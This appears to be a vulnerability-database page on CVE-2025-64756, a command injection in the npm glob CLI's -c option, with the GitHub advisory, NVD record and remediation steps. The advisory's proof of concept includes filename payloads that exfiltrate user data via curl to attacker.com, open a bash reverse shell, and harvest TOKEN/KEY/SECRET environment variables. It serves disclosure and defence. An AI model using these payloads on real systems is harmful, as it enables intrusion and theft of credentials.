"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "glob: glob: Command Injection Vulnerability via Malicious Filenames"
}
]
}
GHSA-5J98-MCP5-4VW2
Vulnerability from github – Published: 2025-11-17 17:38 – Updated: 2025-11-19 02:30Summary
The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.
Details
Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
Technical Flow:
1. User runs glob -c <command> <pattern>
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using shell: true
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
Affected Component:
- CLI Only: The vulnerability affects only the command-line interface
- Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
- Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)
Attack Surface:
- Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
- Any directory where attackers can control filenames (PR branches, archives, user uploads)
- CI/CD pipelines using glob -c on untrusted content
PoC
Setup Malicious File:
mkdir test_directory && cd test_directory
# Create file with command injection payload in filename
touch '$(touch injected_poc)'
Trigger Vulnerability:
# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
Result:
- The echo command executes normally
- Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
- A new file injected_poc is created, proving command execution
- Any command can be injected this way with full user privileges
Advanced Payload Examples:
Data Exfiltration:
# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
Reverse Shell:
# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
Environment Variable Harvesting:
# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
Impact
Arbitrary Command Execution: - Commands execute with full privileges of the user running glob CLI - No privilege escalation required - runs as current user - Access to environment variables, file system, and network
Real-World Attack Scenarios:
1. CI/CD Pipeline Compromise:
- Malicious PR adds files with crafted names to repository
- CI pipeline uses glob -c to process files (linting, testing, deployment)
- Commands execute in CI environment with build secrets and deployment credentials
- Potential for supply chain compromise through artifact tampering
2. Developer Workstation Attack:
- Developer clones repository or extracts archive containing malicious filenames
- Local build scripts use glob -c for file processing
- Developer machine compromise with access to SSH keys, tokens, local services
3. Automated Processing Systems: - Services using glob CLI to process uploaded files or external content - File uploads with malicious names trigger command execution - Server-side compromise with potential for lateral movement
4. Supply Chain Poisoning: - Malicious packages or themes include files with crafted names - Build processes using glob CLI automatically process these files - Wide distribution of compromise through package ecosystems
Platform-Specific Risks: - POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing - Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL - Mixed Environments: CI systems often use Linux containers regardless of developer platform
Affected Products
- Ecosystem: npm
- Package name: glob
- Component: CLI only (
src/bin.mts) - Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
- Introduced: v10.2.0 (first release with CLI containing
-c/--cmdoption) - Patched versions: 11.1.0and 10.5.0
Scope Limitation:
- Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
- CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable
Remediation
- Upgrade to
glob@10.5.0,glob@11.1.0, or higher, as soon as possible. - If any
globCLI actions fail, then convert commands containing positional arguments, to use the--cmd-arg/-goption instead. - As a last resort, use
--shellto maintainshell:truebehavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "glob"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.1.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "glob"
},
"ranges": [
{
"events": [
{
"introduced": "10.2.0"
},
{
"fixed": "10.5.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64756"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-17T17:38:56Z",
"nvd_published_at": "2025-11-17T18:15:58Z",
"severity": "HIGH"
},
"details": "### Summary\n\nThe glob CLI contains a command injection vulnerability in its `-c/--cmd` option that allows arbitrary command execution when processing files with malicious names. When `glob -c \u003ccommand\u003e \u003cpatterns\u003e` is used, matched filenames are passed to a shell with `shell: true`, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.\n\n### Details\n\n**Root Cause:**\nThe vulnerability exists in `src/bin.mts:277` where the CLI collects glob matches and executes the supplied command using `foregroundChild()` with `shell: true`:\n\n```javascript\nstream.on(\u0027end\u0027, () =\u003e foregroundChild(cmd, matches, { shell: true }))\n```\n\n**Technical Flow:**\n1. User runs `glob -c \u003ccommand\u003e \u003cpattern\u003e` \n2. CLI finds files matching the pattern\n3. Matched filenames are collected into an array\n4. Command is executed with matched filenames as arguments using `shell: true`\n5. Shell interprets metacharacters in filenames as command syntax\n6. Malicious filenames execute arbitrary commands\n\n**Affected Component:**\n- **CLI Only:** The vulnerability affects only the command-line interface\n- **Library Safe:** The core glob library API (`glob()`, `globSync()`, streams/iterators) is not affected\n- **Shell Dependency:** Exploitation requires shell metacharacter support (primarily POSIX systems)\n\n**Attack Surface:**\n- Files with names containing shell metacharacters: `$()`, backticks, `;`, `\u0026`, `|`, etc.\n- Any directory where attackers can control filenames (PR branches, archives, user uploads)\n- CI/CD pipelines using `glob -c` on untrusted content\n\n### PoC\n\n**Setup Malicious File:**\n```bash\nmkdir test_directory \u0026\u0026 cd test_directory\n\n# Create file with command injection payload in filename\ntouch \u0027$(touch injected_poc)\u0027\n```\n\n**Trigger Vulnerability:**\n```bash\n# Run glob CLI with -c option\nnode /path/to/glob/dist/esm/bin.mjs -c echo \"**/*\"\n```\n\n**Result:**\n- The echo command executes normally\n- **Additionally:** The `$(touch injected_poc)` in the filename is evaluated by the shell\n- A new file `injected_poc` is created, proving command execution\n- Any command can be injected this way with full user privileges\n\n**Advanced Payload Examples:**\n\n**Data Exfiltration:**\n```bash\n# Filename: $(curl -X POST https://attacker.com/exfil -d \"$(whoami):$(pwd)\" \u003e /dev/null 2\u003e\u00261)\ntouch \u0027$(curl -X POST https://attacker.com/exfil -d \"$(whoami):$(pwd)\" \u003e /dev/null 2\u003e\u00261)\u0027\n```\n\n**Reverse Shell:**\n```bash\n# Filename: $(bash -i \u003e\u0026 /dev/tcp/attacker.com/4444 0\u003e\u00261)\ntouch \u0027$(bash -i \u003e\u0026 /dev/tcp/attacker.com/4444 0\u003e\u00261)\u0027\n```\n\n**Environment Variable Harvesting:**\n```bash\n# Filename: $(env | grep -E \"(TOKEN|KEY|SECRET)\" \u003e /tmp/secrets.txt)\ntouch \u0027$(env | grep -E \"(TOKEN|KEY|SECRET)\" \u003e /tmp/secrets.txt)\u0027\n```\n\n### Impact\n\n**Arbitrary Command Execution:**\n- Commands execute with full privileges of the user running glob CLI\n- No privilege escalation required - runs as current user\n- Access to environment variables, file system, and network\n\n**Real-World Attack Scenarios:**\n\n**1. CI/CD Pipeline Compromise:**\n- Malicious PR adds files with crafted names to repository\n- CI pipeline uses `glob -c` to process files (linting, testing, deployment)\n- Commands execute in CI environment with build secrets and deployment credentials\n- Potential for supply chain compromise through artifact tampering\n\n**2. Developer Workstation Attack:**\n- Developer clones repository or extracts archive containing malicious filenames\n- Local build scripts use `glob -c` for file processing\n- Developer machine compromise with access to SSH keys, tokens, local services\n\n**3. Automated Processing Systems:**\n- Services using glob CLI to process uploaded files or external content\n- File uploads with malicious names trigger command execution\n- Server-side compromise with potential for lateral movement\n\n**4. Supply Chain Poisoning:**\n- Malicious packages or themes include files with crafted names\n- Build processes using glob CLI automatically process these files\n- Wide distribution of compromise through package ecosystems\n\n**Platform-Specific Risks:**\n- **POSIX/Linux/macOS:** High risk due to flexible filename characters and shell parsing\n- **Windows:** Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL\n- **Mixed Environments:** CI systems often use Linux containers regardless of developer platform\n\n### Affected Products\n\n- **Ecosystem:** npm\n- **Package name:** glob\n- **Component:** CLI only (`src/bin.mts`)\n- **Affected versions:** v10.2.0 through v11.0.3 (and likely later versions until patched)\n- **Introduced:** v10.2.0 (first release with CLI containing `-c/--cmd` option)\n- **Patched versions:** 11.1.0and 10.5.0\n\n**Scope Limitation:**\n- **Library API Not Affected:** Core glob functions (`glob()`, `globSync()`, async iterators) are safe\n- **CLI-Specific:** Only the command-line interface with `-c/--cmd` option is vulnerable\n\n### Remediation\n\n- Upgrade to `glob@10.5.0`, `glob@11.1.0`, or higher, as soon as possible.\n- If any `glob` CLI actions fail, then convert commands containing positional arguments, to use the `--cmd-arg`/`-g` option instead.\n- As a last resort, use `--shell` to maintain `shell:true` behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.",
"id": "GHSA-5j98-mcp5-4vw2",
"modified": "2025-11-19T02:30:52Z",
"published": "2025-11-17T17:38:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
},
{
"type": "WEB",
"url": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f"
},
{
"type": "WEB",
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
},
{
"type": "PACKAGE",
"url": "https://github.com/isaacs/node-glob"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "glob CLI: Command injection via -c/--cmd executes matches with shell:true"
}
FKIE_CVE-2025-64756
Vulnerability from fkie_nvd - Published: 2025-11-17 18:15 - Updated: 2025-12-02 19:34{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:isaacs:glob:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3C8601DB-5326-473F-8AB9-6F66833AC884",
"versionEndExcluding": "10.5.0",
"versionStartIncluding": "10.2.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:isaacs:glob:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "F7828865-293E-4DB7-AC94-A3C1027E25A1",
"versionEndExcluding": "11.1.0",
"versionStartIncluding": "11.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0."
}
],
"id": "CVE-2025-64756",
"lastModified": "2025-12-02T19:34:43.270",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-11-17T18:15:58.270",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.